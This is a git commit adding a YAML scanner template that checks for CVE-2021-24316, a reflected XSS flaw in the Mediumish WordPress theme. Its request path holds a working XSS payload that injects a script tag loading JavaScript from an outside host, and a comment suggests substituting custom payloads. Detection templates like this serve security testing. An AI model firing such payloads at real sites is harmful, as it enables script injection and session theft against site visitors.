Create CVE-2021-24316.yaml
parent
fcbe41f23d
commit
2171f7ec21
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2021-24316
|
||||
|
||||
info:
|
||||
author: 0x_Akoko
|
||||
description: Mediumish WordPress Theme <= 1.0.47 - Unauthenticated Reflected XSS & XFS.
|
||||
name: An Unauthenticated Reflected XSS & XFS Mediumish theme through 1.0.47 for WordPress
|
||||
severity: medium
|
||||
tags: Mediumish,xss,wordpress
|
||||
reference: |
|
||||
- https://vulmon.com/vulnerabilitydetails?qid=CVE-2021-24316
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
## you can edit this js file with your custom js. //m0ze.ru/payload/a2r.js decode it (base64) with your own.
|
||||
- '{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fa2r.js%3E%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "<script src=https://m0ze.ru/payload/a2r.js></script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "text/html"
|
||||
part: header
|
Loading…
Reference in New Issue